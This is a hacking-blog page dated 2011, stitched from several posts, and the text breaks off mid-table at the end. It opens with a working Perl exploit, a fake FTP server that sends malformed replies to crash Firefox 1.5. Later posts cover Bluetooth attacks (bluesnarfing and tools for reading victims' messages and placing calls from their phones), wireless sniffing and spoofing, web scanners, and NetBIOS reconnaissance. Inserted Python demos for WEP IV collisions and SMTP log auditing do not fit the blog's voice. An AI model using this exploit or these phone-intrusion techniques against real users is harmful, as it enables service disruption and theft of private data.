FireSale HackBoy


Thursday, November 3, 2011

Mozilla Firefox FTP Request Remote DoS (Exploit)

Vulnerable Systems:
*Mozilla Firefox version 1.5.0.6 and prior.

Exploit:
#!/usr/bin/perl
#author: tomas kempinsky
#
# Fake FTP server: listens on $port and answers every client that connects
# with the malformed response sequence in $payload, then drops the connection.

use strict;
use warnings;
use Socket;

my $port  = shift || 2121;
my $proto = getprotobyname('tcp');

# Response sequence sent to each client (hex-encoded ASCII):
#   "220 Z\r\n"  "331 Z\r\n"  "500 DoS\r\n"  "500 Z\r\n"
my $payload = "\x32\x32\x30\x20\x5a\x0d\x0a\x33"
            . "\x33\x31\x20\x5a\x0d\x0a\x35\x30"
            . "\x30\x20\x44\x6f\x53\x0d\x0a\x35"
            . "\x30\x30\x20\x5a\x0d\x0a";

socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, 1) or die "setsock: $!";

my $paddr = sockaddr_in($port, INADDR_ANY);
bind(SERVER, $paddr)      or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";

# URL the vulnerable browser is pointed at; "\x0" embeds a NUL byte
# between the "D:oS@" user-info part and the host name.
print "ftp://D:oS@\x0localhost:$port/\n";

my $client_addr;
while ($client_addr = accept(CLIENT, SERVER)) {
    # find out who connected (fall back to the IP if reverse lookup fails)
    my ($client_port, $client_ip) = sockaddr_in($client_addr);
    my $client_ipnum = inet_ntoa($client_ip);
    my $client_host  = gethostbyaddr($client_ip, AF_INET) || $client_ipnum;
    print ": $client_host", "[$client_ipnum]\n";
    # send them the payload, close connection
    print CLIENT $payload;
    close CLIENT;
}

BlueTooth Hacking Tools

Discovering Bluetooth Devices :-
Before any two Bluetooth-enabled devices can start communicating with one another, they must carry out a procedure known as discovery. It is carried out by scanning for other active devices within range.

Recommended Tools
BlueScanner :- It tries to extract as much information as possible from each newly discovered device.
BlueSniff :- It is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices.
BTBrowser :- It is a J2ME application that can browse and explore the technical specifications of surrounding Bluetooth-enabled devices. It works on phones that support JSR-82, the Java Bluetooth specification.
BTCrawler :- It is a scanner for Windows Mobile based devices. It also implements the BlueJacking and BlueSnarfing attacks.

Hacking Bluetooth Devices :-
There are many types of Bluetooth-related threats and attacks that can be executed against unsuspecting mobile phone users. The following are some of the most common :-

1) BluePrinting Attack :- Information gathering is the first step in the quest to break into a target system. Bluetooth devices, too, can be fingerprinted or probed for information using the technique known as BluePrinting. Using it, one can determine the manufacturer, model, version, etc. of a target Bluetooth-enabled device.

Recommended Tools
BluePrint :- As the name suggests, it performs BluePrinting of Bluetooth devices.
BTScanner :- It is an information gathering tool that allows an attacker to query devices without the need to carry out pairing.

2) BlueJack Attack :- Bluejacking is the process of sending an anonymous message from one Bluetooth-enabled phone to another within range, without the recipient knowing the exact source of the received message.

Recommended Tools
FreeJack :- Bluejacking tool written in Java.
CIHWB :- Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. It supports BlueSnarf, BlueJack, and some DoS attacks. It should work on any PocketPC with the Microsoft Bluetooth stack.

3) BlueSnarf Attack :- Bluesnarfing is the process of connecting to vulnerable mobile phones through Bluetooth without the victim's knowledge. It uses the OBEX protocol, by which an attacker can forcibly push/pull sensitive data into/out of the victim's mobile phone; hence it is also known as the OBEX pull attack.
This attack requires a J2ME-enabled mobile phone as the attacker's tool. With a J2ME-enabled phone, just by using bluesnarfing tools like Blooover, Redsnarf, Bluesnarf, etc., an attacker can break into the target mobile phone and steal sensitive data such as the address book, photos, mp3s, videos, SMS, ......!

4) Blue Backdoor Attack :- Here, the Bluetooth-related vulnerability exploits the pairing mechanism that is used to establish a connection between two Bluetooth-enabled devices. Not only does it give the attacker complete access and control over the target, but it also allows the attacker to place strategic backdoors for continued access and entry.

5) BlueBug Attack :- It was first discovered by Martin Herfurt and allows attackers to gain complete control over the data, voice and messaging channels of vulnerable target mobile phones.

Recommended Tools
BlueBugger :- Exploits the BlueBug vulnerability.
Bluediving :- It is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, etc.

6) Short Pairing Codes :- The Bluetooth protocol allows devices to use pairing codes up to 16 digits long. Unfortunately many applications continue to use only 4-digit pairing codes, which can easily be brute-forced. This weakness is known as short pairing codes.
Most slave Bluetooth devices continue to use default pairing codes such as 0000, 1111, 1234, etc., so they are easy to crack and gain access to...!

Recommended Tools
BTCrack :- BTCrack is a Bluetooth passphrase (PIN) cracking tool. It aims to reconstruct the passkey and the link key from captured pairing exchanges.



-: Other Powerful BlueTooth Hacking Tools :-

Transient Bluetooth Environment Auditor :- T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools.
BlueTest :- BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices.
BTAudit :- BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices.
RedFang :- It is a brute force tool that finds even non-discoverable devices.
BlueAlert :- A Windows-based tool that runs on a Bluetooth-enabled computer and alerts the user each time a Bluetooth device leaves or enters its range.
BlueFang :- Similar to BlueAlert.
Bluestumbler :- One of the best BluePrinting tools.

Super Bluetooth Hack :- With this Java software you can connect to another mobile and ….

Once connected to another phone via Bluetooth you can:
  • Read his/her messages
  • Read his/her contacts
  • Change the profile
  • Play a ringtone even if the phone is on silent
  • Play songs
  • Restart the phone
  • Switch off the phone
  • Restore factory settings
  • Change the ringing volume
  • Call from his phone; it includes all call functions like hold, etc.
Notes:-
1) When connecting devices, use the code 0000.
2) Before starting the program on a smartphone, do not forget to turn on Bluetooth.
  Download- Super_Bluetooth_Hack_v1.07.zip (99 KB)



Recommended Tools
Blooover :- It is a J2ME-based auditing tool, intended to check whether a mobile phone is vulnerable. It can also be used to carry out the BlueBug attack.
RedSnarf :- One of the best bluesnarfing tools.
BlueSnarfer :- It downloads the phone book of any mobile device vulnerable to bluesnarfing.

Wireless Hacking

Wireless networks broadcast their packets using radio frequencies or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step-by-step procedure of wireless hacking can be explained with the help of the following topics:-

1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

2) Channels :- The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

3) Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

4) Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

5) Passive Scanning :- Scanning is the act of sniffing by tuning to the various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

6) Detection of SSID :- The attacker can usually discover the SSID of a network by passive scanning, because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning.

7) Collecting the MAC Addresses :- The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.

8) Collecting the Frames for Cracking WEP :- The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames. An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

9) Detection of the Sniffers :- Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

10) Wireless Spoofing :- There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

11) MAC Address Spoofing :- The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

12) IP spoofing :- Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

13) Frame Spoofing :- The attacker will inject frames that are valid but whose content is carefully spoofed.

14) Wireless Network Probing :- The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

15) AP Weaknesses :- APs have weaknesses that are due both to design mistakes and to their user interfaces.

16) Trojan AP :- An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

17) Denial of Service :- A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent and difficult to stop once under way, and the victim and its clients may not even detect the attack. The duration of such a DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

18) Jamming the Air Waves :- A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4 GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal-to-noise ratio drops so low that the wireless LAN ceases to function.

19) War Driving :- Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.
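Items 3) and 8) above describe WEP as RC4 keyed per frame with a 24-bit IV and note that an attacker only needs to sniff enough frames. The Python block below is an added example, not part of the original article: it implements a minimal WEP-style frame encryption (RC4 over IV || shared key, with the CRC-32 ICV) to show that two frames sharing an IV leak the XOR of their plaintexts, and it computes how few frames a busy network needs before IVs start repeating. The key, IV and payloads are constructed values; real WEP key recovery also relies on RC4 key-scheduling weaknesses that this block does not model.

```python
import math
import zlib

IV_SPACE = 1 << 24  # the WEP initialisation vector is only 24 bits wide


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Generate `length` bytes of RC4 keystream for `key` (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):  # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP-style frame body: RC4(IV || key) applied to payload || CRC-32 ICV.

    The 3-byte IV travels in the clear in the frame header, so a sniffer
    always knows which per-packet key a frame used (though not the key).
    The key-ID byte and 802.11 headers are omitted for brevity.
    """
    if len(iv) != 3:
        raise ValueError("WEP IV must be 3 bytes")
    icv = (zlib.crc32(payload) & 0xFFFFFFFF).to_bytes(4, "little")
    body = payload + icv
    return xor_bytes(body, rc4_keystream(iv + shared_key, len(body)))


def wep_decrypt(shared_key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """Reverse of wep_encrypt; raises ValueError if the ICV does not match."""
    body = xor_bytes(ciphertext, rc4_keystream(iv + shared_key, len(ciphertext)))
    payload, icv = body[:-4], body[-4:]
    if (zlib.crc32(payload) & 0xFFFFFFFF).to_bytes(4, "little") != icv:
        raise ValueError("ICV mismatch")
    return payload


def iv_collision_probability(n_frames: int) -> float:
    """Birthday bound: P(at least one repeated IV) after n_frames random IVs."""
    return 1.0 - math.exp(-n_frames * (n_frames - 1) / (2.0 * IV_SPACE))


def frames_for_collision_probability(p: float) -> int:
    """Smallest frame count at which an IV repeat has probability >= p."""
    # solve n(n-1)/(2N) = -ln(1-p) for n
    return math.ceil(0.5 + math.sqrt(0.25 - 2.0 * IV_SPACE * math.log(1.0 - p)))


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")   # constructed 40-bit WEP key
    iv = b"\x00\x00\x01"                # constructed IV, sent in the clear
    p1, p2 = b"GET /index.html ", b"password=secret1"
    c1, c2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)
    # Same IV => same keystream => c1 XOR c2 == p1 XOR p2, with no key needed.
    print("same-IV XOR leak:", xor_bytes(c1, c2)[: len(p1)] == xor_bytes(p1, p2))
    print("frames for a 50% chance of an IV repeat:", frames_for_collision_probability(0.5))
```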



Tips for Wireless Home Network Security

1) Change Default Administrator Passwords (and Usernames)
2) Turn on (Compatible) WPA / WEP Encryption
3) Change the Default SSID
4) Disable SSID Broadcast
5) Assign Static IP Addresses to Devices
6) Enable MAC Address Filtering
7) Turn Off the Network During Extended Periods of Non-Use
8) Position the Router or Access Point Safely

Email Security Best Practices from Microsoft

Over the years, Microsoft has taken its lumps when it comes to security; however, as a company, they have taken some pretty impressive strides to make sure that their products are more secure.
Their security efforts have not been limited to just their products, either. They have launched several educational campaigns aimed at helping users better secure their computers and networks.
These efforts can be seen by Microsoft’s latest report, Microsoft Security Intelligence Report, and its corresponding website.
This project was set up to provide businesses and consumers with hard data concerning security risks and best practices from Microsoft themselves on how to mitigate the various risks.
Being the producer of the most popular email client software packages – Outlook, Hotmail, Outlook Express and Windows Live Mail – they have a definite interest when it comes to helping users guard against email threats.
Spam, according to Microsoft:
  • Wastes resources
  • Distracts recipients
  • Puts assets at risk for greater security problems
  • Provides an avenue for social and criminal hacking attempts
  • Provides an avenue for phishing scams against users
While stopping these issues definitely is a concern for Microsoft internally, educating their customers on how to eliminate the problems associated with spam will certainly help them sell more products to people looking for the most secure product on the market.

A Look Inside Microsoft

According to their website, Microsoft filters between five to ten million email messages every day that contain malware and/or spam. On a daily basis, they see threats that include spyware, worms, attacks from botnets and polymorphic viruses attacking their email messaging systems. Each day more than 100 different types of executable files are removed from incoming messages sent to Microsoft employees.
So we can safely say that as an organization, there is little that they haven’t seen when it comes to protecting email systems.
To best fight the many different threats facing email, all inbound email to Microsoft must pass a three-tiered process that includes anti-malware scanning, file removal and spam filtering.
The importance of this approach is simple. Stop threats before they reach the user.
Incorporating an anti-malware scan into messaging systems helps protect the integrity of your systems because threats can be stopped before a user has the opportunity to allow infected files to compromise a computer or network.
Likewise, a file removal process prevents malicious executables sent via email attachment from ever having the chance to launch. Followed with adequate spam filtering, this process reduces the need for organizations to rely solely on a desktop-based security solution or a network firewall, neither of which provides comprehensive protection on its own.
These strategies seem like common sense steps that we would hardly need to rely on Microsoft to provide. However many organizations neglect to incorporate these simple strategies into their planning.

Other Ideas from Redmond

Keeping systems protected cannot be done by simply scanning incoming messages for threats. Other steps need to be taken. The best practices that Microsoft recommends to organizations are as follows:
  • Provide email submission services on port 587.
  • Require SMTP authentication for email submissions.
  • Abstain from interfering with connectivity to port 587.
  • Configure email client software to use port 587 and authentication for email submission.
  • Block access to port 25 from all hosts on your network other than those you explicitly authorize to perform SMTP relay functions.
  • Monitor outbound email traffic patterns and look for deviations from normal behavior, such as abnormally large bursts of email traffic.
  • Disable computers or individual email accounts that have been compromised and are being used to send out spam.
  • When possible, process abuse complaints from third parties for email that originated from your mail servers. These complaints often point the way to a compromised computer.
As email administrators, we tend to look to hardware and software solutions to keep things running smoothly and securely. However, protecting systems and users from threats is ultimately our responsibility. Knowing the best way to do so is part of the job description.
Turning to experts for advice when it comes to security does not mean we are unable to do things on our own, it means we are wise enough to use what works and smart enough to know where to look.
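The Python block below is an added example, not from the Microsoft report or this article: it checks a set of outbound SMTP connection records against three of the listed practices (port 25 egress only from authorized relays, authenticated submission on port 587, and burst detection on outbound volume). The record format, host names and the AUTHORIZED_RELAYS set are constructed assumptions; the records are expected in time order, as a log would be.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of outbound SMTP connection records (not real logs):
# "<ISO timestamp> <source host> <destination port> <authenticated yes/no>"
SAMPLE_LOG = """\
2011-11-03T09:00:00 ws-101 587 yes
2011-11-03T09:00:05 ws-102 25 no
2011-11-03T09:00:07 relay-1 25 no
2011-11-03T09:00:09 ws-104 587 no
2011-11-03T09:01:00 ws-101 587 yes
"""
# Constructed burst: one workstation submitting 40 messages in under a minute,
# the kind of deviation the "monitor outbound traffic patterns" item targets.
SAMPLE_LOG += "".join(f"2011-11-03T09:02:{i:02d} ws-103 587 yes\n" for i in range(40))

AUTHORIZED_RELAYS = {"relay-1"}  # hosts explicitly allowed to talk to port 25


def parse_line(line):
    ts, host, port, auth = line.split()
    return datetime.fromisoformat(ts), host, int(port), auth == "yes"


def audit(log_text, authorized_relays=AUTHORIZED_RELAYS,
          burst_threshold=20, window_seconds=60):
    """Return policy findings for the records in log_text.

    unauthorized_port25:        hosts reaching port 25 that are not approved relays
    unauthenticated_submission: hosts submitting on 587 without SMTP AUTH
    bursts:                     host -> peak message count inside the sliding window
    """
    findings = {"unauthorized_port25": set(),
                "unauthenticated_submission": set(),
                "bursts": {}}
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)  # host -> timestamps still inside the window
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, port, authed = parse_line(line)
        if port == 25 and host not in authorized_relays:
            findings["unauthorized_port25"].add(host)
        if port == 587 and not authed:
            findings["unauthenticated_submission"].add(host)
        q = recent[host]
        q.append(ts)
        while q and ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > burst_threshold:
            findings["bursts"][host] = max(findings["bursts"].get(host, 0), len(q))
    return findings


if __name__ == "__main__":
    for category, result in audit(SAMPLE_LOG).items():
        print(f"{category}: {result}")
```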

WebSurgery – Web Application Security Testing Suite

WebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with web application planning and exploitation. Currently it comprises an efficient, fast and stable Web Crawler, a File/Dir Brute forcer, a Fuzzer for advanced exploitation of known and unusual vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), brute force for login forms, identification of firewall-filtered rules and DoS attacks, and a Web Proxy to analyze, intercept and manipulate the traffic between your browser and the target web application.
WEB Crawler
WEB Crawler was designed to be fast, accurate, stable and completely parameterizable, and to use advanced techniques to extract links from JavaScript and HTML tags. It works with parameterizable timing settings (Timeout, Threading, Max Data Size, Retries) and a number of rule parameters to prevent infinite loops and pointless scanning (Case Sensitive, Dir Depth, Process Above/Below, Submit Forms, Fetch Indexes/Sitemaps, Max Requests per File/Script Parameters). It is also possible to apply custom headers (user agent, cookies etc.) and Include/Exclude Filters. WEB Crawler comes with an embedded File/Dir Brute Forcer which helps to directly brute force for files/dirs in the directories found from crawling.
WEB Bruteforcer
WEB Bruteforcer is a brute forcer for files and directories within the web application which helps to identify the hidden structure. It is also multi-threaded and completely parameterizable for timing settings (Timeout, Threading, Max Data Size, Retries) and rules (Headers, Base Dir, Brute force Dirs/Files, Recursive, File’s Extension, Send GET/HEAD, Follow Redirects, Process Cookies and List generator configuration).
By default, it will brute force from the root / base dir recursively for both files and directories. It sends both HEAD and GET requests when needed (HEAD to identify whether the file/dir exists and then GET to retrieve the full response).
WEB Fuzzer
WEB Fuzzer is a more advanced tool to create a number of requests based on one initial request. Fuzzer has no limits and can be used to exploit known vulnerabilities such as (blind) SQL injections and, in more unusual ways, to identify improper input handling, firewall/filtering rules and DoS attacks.
WEB Editor
A simple WEB Editor to send individual requests. It also contains a HEX Editor for more advanced requests.
WEB Proxy
WEB Proxy is a proxy server running locally that will allow you to analyze, intercept and manipulate HTTP/HTTPS requests coming from your browser or any other application which supports proxies.
You can download WebSurgery here:
Setup – setup.msi
Portable – websurgery.zip

WAVSEP – Web Application Vulnerability Scanner Evaluation Project (14 Sep)

The author of WAVSEP (Shay Chen) e-mailed quite some time back about this project, but I have to say I honestly didn’t have time to look at it back then. It popped back up on my radar again when it was mentioned by the author of – Arachni v0.3 – his tool did extremely well in the WAVSEP tests.
The benchmark tests the SQL Injection and Reflected XSS vulnerability detection accuracy of 12 commercial web application scanners and 48 free & open source web application scanners, and discusses the capabilities of many others (including information about a potential Trojan horse in one of them).
In addition to the benchmark, the author has published a detailed feature comparison between all the scanners (which generally include every open source or free to use web application vulnerability scanner commonly available)
The research compares the following aspects of these tools:
  • Number & Type of Vulnerability Detection Features
  • SQL Injection Detection Accuracy
  • Reflected Cross Site Scripting Detection Accuracy
  • General & Special Scanning Features
And what the author believes to be most important is that during his research he has developed a toolkit that can be used by any individual or organization to test the accuracy of web application scanners in a very detailed and accurate manner.
I for one applaud his efforts and I think this is a great project, of course there’s no completely objective ranking for these kind of things – but this study does give you a good idea of where different apps stand especially in terms of SQL Injection and XSS detection.
A lot of the tools we’ve written about here at Darknet come out tops (unsurprisingly).
The benchmark and reports (about 13 in total) can be found here:
http://sectooladdict.blogspot.com/
The framework for assessing vulnerability scanners was implemented in JEE and can be downloaded here:
wavsep-v1.0.3-war.zip

Lilith – Web Application Security Audit Tool

LiLith is a tool written in Perl to audit web applications. This tool analyses webpages and looks for HTML form tags, which often refer to dynamic pages that might be subject to SQL injection or other flaws. It works as an ordinary spider and analyses pages, following hyperlinks and injecting special characters that have a special meaning to any underlying platform.
No web application scanner can ever perform a fully correct audit. Therefore, a manual re-check is necessary. Hence, be aware that Lilith might come up with several false positives.
LiLith is a program that verifies the security of a web application. As a security consultant, the author often sees web applications that contain security flaws. A web application is a complex entity and cannot be fully checked with “just any tool”, therefore I recommend you manually verify any results.
How the entire “scanning” process works is different from so-called “CGI scanners” such as nikto and n-stealth. This program will surf to a website and crawl through all the links, just as a user would too. On any possible input field, such as text boxes, page id’s, … LiLith will attempt to inject any characters that might have a special meaning for any underlying technology such as SQL.
For more information, it is recommended to read the following white paper: web dissection using lilith.
You can download Lilith here:
lilith-06atar.gz

VeriSign Demands The Power To Take Down Websites/Domains

I was scanning the news today, and nothing much was going on. There were some half-arsed stories about Anonymous and LulzSec – but nothing really worth writing about. And then, and then I spotted this, which quite frankly scares the shit out of me.
As much as it may well have a use in law enforcement, I’m sorry but I don’t want any single organization, corporation or entity to have the power to take out domains.
It’s just plain wrong, and well the UK has already started tabling something like this back in September.
VeriSign, which manages the database of all .com internet addresses, wants powers to shut down “non-legitimate” domain names when asked to by law enforcement.
The company said today it wants to be able to enforce the “denial, cancellation or transfer of any registration” in any of a laundry list of scenarios where a domain is deemed to be “abusive”.
VeriSign should be able to shut down a .com or .net domain, and therefore its associated website and email, “to comply with any applicable court orders, laws, government rules or requirements, requests of law enforcement or other governmental or quasi-governmental agency, or any dispute resolution process”, according to a document it filed today with domain name industry overseer ICANN.
The company has already helped law enforcement agencies in the US, such as the Immigration and Customs Enforcement agency, seize domains that were allegedly being used to sell counterfeit goods or facilitate online piracy, when the agency first obtained a court order.
That seizure process has come under fire because, in at least one fringe case, a seized .com domain’s website had already been ruled legal by a court in its native Spain.
Senior ICE agents are on record saying that they believe all .com addresses fall under US jurisdiction.
But the new powers would be international and, according to VeriSign’s filing, could enable it to shut down a domain also when it receives “requests from law enforcement”, without a court order.
Yes, VeriSign does manage all the .com and .net domains, but they aren’t technically under US jurisdiction – there are plenty of .com domains that are hosted outside of the US, including the DNS infrastructure.
What I’m especially interested in, is how they plan to handle the fact that lots of things are illegal in some countries and perfectly legal in others. The part that scares me is they will be able to take down a domain without a court order, just on ‘request’ from a law enforcement agency.
To me, that opens it up to abuse – if you are going to do something like this, at least institute a due process to manage it properly.

“Various law enforcement personnel, around the globe, have asked us to mitigate domain name abuse, and have validated our approach to rapid suspension of malicious domain names,” VeriSign told ICANN, describing its system as “an integrated response to criminal activities that utilize Verisign-managed [top-level domains] and DNS infrastructure”.
The company said it has already cooperated with US law enforcement, including the FBI, to craft the suspension policies, and that it intends to also work with police in Europe and elsewhere.
It’s not yet clear how VeriSign would handle a request to suspend a .com domain that was hosting content legal in the US and Europe but illegal in, for example, Saudi Arabia or Uganda.
VeriSign made the request in a Registry Services Evaluation Process (RSEP) document filed today with ICANN. The RSEP is currently the primary mechanism that registries employ when they want to make significant changes to their contracts with ICANN.
The request also separately asks for permission to launch a “malware scanning service”, not dissimilar to the one recently introduced by ICM Registry, manager of the new .xxx extension.
That service would enable VeriSign to scan all .com websites once per quarter for malware and then provide a free “informational only” security report to the registrar responsible for the domain, which would then be able to take re-mediation action. It would be a voluntary service.
Scary thoughts really. However the malware scanning service sounds like something that would help the Internet clean up all the nasty stuff, but then again – do the registrars really care, and would they respond?
Either way, I don’t like the fact that these draconian control laws may be placed on the Internet as we know it – laws that basically allow US law enforcement agencies to take down domains as they please.
What I’m guessing is that, if this is implemented, it may well become a major target for social engineering efforts. What’s more effective than a traditional DDoS attack? Having the domain completely killed by VeriSign – that’s what.
Source: The Register

DirBuster – Brute Force Directories & Files Names

DirBuster is another great tool from the OWASP chaps; it’s basically a multi-threaded Java application designed to brute force directory and file names on web/application servers. Often what looks like a web server in a default installation state is actually not, and has pages and applications hidden within. DirBuster attempts to find these.
However, tools of this nature are often only as good as the directory and file list they come with. A different approach was taken to generating this one. The list was generated from scratch, by crawling the Internet and collecting the directories and files that are actually used by developers! DirBuster comes with a total of 9 different lists (further information can be found below), which makes DirBuster extremely effective at finding those hidden files and directories. And if that was not enough, DirBuster also has the option to perform a pure brute force, which leaves the hidden directories and files nowhere to hide! If you have the time ;)
What DirBuster can do for you

- Attempt to find hidden pages/directories within a web application, thus giving another attack vector (for example, finding an unlinked administration page).
What DirBuster will not do for you
- Exploit anything it finds. This is not the purpose of DirBuster. DirBuster’s sole job is to find other possible attack vectors.
How does DirBuster help in the building of secure applications?
- By finding content on the web server or within the application that is not required.
- By helping developers understand that by simply not linking to a page does not mean it can not be accessed.
You can download DirBuster here:
LinuxDirBuster-0.12.tar.bz2
WindowsDirBuster-0.12-Setup.exe
MacDirBuster-0.11.1.dmg

Remote Network Penetration via NetBIOS- NetBios Hacking

These are basic techniques but very useful when penetration testing any Windows based network, the techniques were discovered on WinNT but are still very valid on Windows2000 and in some cases Windows2003 due to backwards compatibility.
This article is being written in a procedural manner. I have approached it much like an intruder would actually approach a network penetration. Most of the techniques discussed in this text are rather easy to accomplish once one understands how and why something is being done.
When targeting a given network, the first thing an intruder would do would be to portscan the remote machine or network. A lot of information can be gathered by a simple port scan, but what the intruder is looking for is an open port 139 – the default NetBIOS port. It’s surprising how methodical an attack can become based on the open ports of a target machine. You should understand that it is the norm for an NT machine to display different open ports than a Unix machine.
Intruders learn to view a portscan and tell whether it is an NT or Unix machine with fairly accurate results. Obviously there are some exceptions to this, but generally it can be done.
Recently, several tools have been released to fingerprint a machine remotely, but this functionality has not been made available for NT.
Information gathering with NetBIOS can be a fairly easy thing to accomplish, albeit a bit time consuming. NetBIOS is generally considered a bulky protocol with high overhead and tends to be slow, which is where the consumption of time comes in.
If the portscan reports that port 139 is open on the target machine, a natural process follows. The first step is to issue an NBTSTAT command.
The NBTSTAT command can be used to query network machines concerning NetBIOS information. It can also be useful for purging the NetBIOS cache and preloading the LMHOSTS file. This one command can be extremely useful when performing security audits.
Interpretation the information can reveal more than one might think.
Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]
Switches
-a Lists the remote computer's name table given its host name.
-A Lists the remote computer's name table given its IP address.
-c Lists the remote name cache including the IP addresses.
-n Lists local NetBIOS names.
-r Lists names resolved by broadcast and via WINS.
-R Purges and reloads the remote cache name table.
-S Lists sessions table with the destination IP addresses.
-s Lists sessions table conversions.
The column headings generated by NBTSTAT have the following meanings:
Input: Number of bytes received.
Output: Number of bytes sent.
In/Out: Whether the connection is from the computer (outbound) or from another system to the local computer (inbound).
Life: The remaining time that a name table cache entry will "live" before your computer purges it.
Local Name: The local NetBIOS name given to the connection.
Remote Host: The name or IP address of the remote host.
Type: A name can have one of two types: unique or group. The last byte of the 16 character NetBIOS name often means something because the same name can be present multiple times on the same computer. This shows the last byte of the name converted into hex.
State: Your NetBIOS connections will be shown in one of the following "states":

State          Meaning
Accepting      An incoming connection is in process.
Associated     The endpoint for a connection has been created and your computer has associated it with an IP address.
Connected      This is a good state! It means you're connected to the remote resource.
Connecting     Your session is trying to resolve the name-to-IP address mapping of the destination resource.
Disconnected   Your computer requested a disconnect, and it is waiting for the remote computer to do so.
Disconnecting  Your connection is ending.
Idle           The remote computer has been opened in the current session, but is currently not accepting connections.
Inbound        An inbound session is trying to connect.
Listening      The remote computer is available.
Outbound       Your session is creating the TCP connection.
Reconnecting   If your connection failed on the first attempt, it will display this state as it tries to reconnect.
Here is a sample NBTSTAT response of my NT Box:
C:\>nbtstat -A 195.171.236.139

       NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    MR_B10NDE      <00>  UNIQUE      Registered
    WINSEKURE LABS <00>  GROUP       Registered
    MR_B10NDE      <03>  UNIQUE      Registered
    MR_B10NDE      <20>  UNIQUE      Registered
    WINSEKURE LABS <1E>  GROUP       Registered

    MAC Address = 44-45-53-54-00-00

Using the table below, what can you learn about the machine?

Name                 Number  Type  Usage
=========================================================================
<computername>       00      U     Workstation Service
